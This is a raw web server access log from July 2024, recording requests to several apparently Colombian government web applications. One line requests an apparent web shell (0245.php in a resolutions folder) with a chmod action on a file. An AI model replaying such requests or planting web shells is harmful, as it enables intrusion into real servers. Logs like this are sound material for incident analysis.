186.102.111.85 - - [13/Jul/2024:18:11:59 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+2Stoc1G4MWvdnuolTV7y/99kxQL5wmxsFYCNbzf5uFMe5sBK1LK3Qi0EcC3emUE8zKAXoXBjRvPViHzaKAjqt89kOieXnztstZLNNnoux4KM3g8/miW2z17lC6t+y5+dsuquZPeT/oZW1bD7tmgpbuNvohIpIM7VmNp3mWGPSqKQKgcNwOKIn&u=U2FsdGVkX19cdp4iRh4jbhwsTaCb42ocaRqKPfDKdLw=&y=U2FsdGVkX1/XwI6F1IuoDiK+MqIsak4Rc0LF2d09Vf+17yDwk8TG646oEe1yvQDB HTTP/1.1" 200 26
186.102.111.85 - - [13/Jul/2024:18:11:59 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/eAIuPy9EtREwDja+AFSFXdBqjahTuWhkEVnu4uU2qeVf8dUbzy9UDOlEapIji+Ck9M4+/V+zNkzASNxUt8snCJuQYGqKiiQzIHAdkHrw6IdbqrR0x67ewK06789ADUETjWVAoTekxGNUyPYC/FfEUvSMo0zPAXfE62Gr4CoGVsCz6O/i307Kp2gQzo2yfgFcDutgISJpbQA==&u=U2FsdGVkX19cdp4iRh4jbhwsTaCb42ocaRqKPfDKdLw=&y=U2FsdGVkX1/XwI6F1IuoDiK+MqIsak4Rc0LF2d09Vf+17yDwk8TG646oEe1yvQDB HTTP/1.1" 200 26
186.102.111.85 - - [13/Jul/2024:18:11:59 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/0r3QwsDCtKVJXTHtBIhPbDCDXTScRiirJ4dbN73Z/ixK7RZiKGTfQGE+0vdcGoSoIOHO/PgbJxu5ugXcVGjb9+7tdfGfVf/gVKfQva9n4+yraFqWXup1vPHVl8diRTuIZx1MRrTtIt70n80k79bZEWRPjmuF99DtGCoWmtYqV8Uq1RFEHMPop&u=U2FsdGVkX19cdp4iRh4jbhwsTaCb42ocaRqKPfDKdLw=&y=U2FsdGVkX1/XwI6F1IuoDiK+MqIsak4Rc0LF2d09Vf+17yDwk8TG646oEe1yvQDB HTTP/1.1" 200 26
186.102.111.85 - - [13/Jul/2024:18:11:59 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18t6chL/e5zcbg39Jz5jtB8JbTFAklI7TMGapy0BAm16Rku6iELxAna89rLPwKrbwA6NulJN99CE0sUpqZGvO0knhh8iGwETfx7fE9P9zXIkIrY4W3cVzvK6F6OP00m/tnKFE5hmOvp3PJpcdaMJNTudAWPI5PvQjb8VE0bdVztA0DJ2/GerbF5b515APOqFqdWs/4bc1gJIw==&u=U2FsdGVkX19cdp4iRh4jbhwsTaCb42ocaRqKPfDKdLw=&y=U2FsdGVkX1/XwI6F1IuoDiK+MqIsak4Rc0LF2d09Vf+17yDwk8TG646oEe1yvQDB HTTP/1.1" 200 26
186.102.111.85 - - [13/Jul/2024:18:12:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+gBBkl7XwiNL5mRPPK5MbNQf14J/Bvr/hc4xViF5HUBzjyirKYtCzp3PqdLQINzbPeoYKHo7gfGunfeH4HIBWZTbLv8X0uPHOznwNL4xLZn5OkzjC8lwodKZjvgkmyri1uEJrIGlXR5WacjENGzsdZ4pdhBTmte90IFagKkK7Ggkt6NFj0Uy56HhOloICQh9iWinid/rvtsQ==&u=U2FsdGVkX19cdp4iRh4jbhwsTaCb42ocaRqKPfDKdLw=&y=U2FsdGVkX1/XwI6F1IuoDiK+MqIsak4Rc0LF2d09Vf+17yDwk8TG646oEe1yvQDB HTTP/1.1" 200 26
181.53.13.210 - - [13/Jul/2024:18:11:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
181.53.13.210 - - [13/Jul/2024:18:11:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 16331
201.245.192.253 - - [13/Jul/2024:18:12:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.60.39 - - [13/Jul/2024:18:12:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=RESOLUCION+326+DE+2010.PDF HTTP/1.1" 200 2714
200.118.80.110 - - [13/Jul/2024:18:12:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.80.110 - - [13/Jul/2024:18:12:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.80.110 - - [13/Jul/2024:18:12:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.80.110 - - [13/Jul/2024:18:12:13 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.118.80.110 - - [13/Jul/2024:18:12:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.80.110 - - [13/Jul/2024:18:12:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.80.110 - - [13/Jul/2024:18:12:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.80.110 - - [13/Jul/2024:18:12:04 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 200 171601
200.118.80.110 - - [13/Jul/2024:18:12:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 21131
200.118.80.110 - - [13/Jul/2024:18:12:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.80.110 - - [13/Jul/2024:18:12:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.80.110 - - [13/Jul/2024:18:12:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.80.110 - - [13/Jul/2024:18:12:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
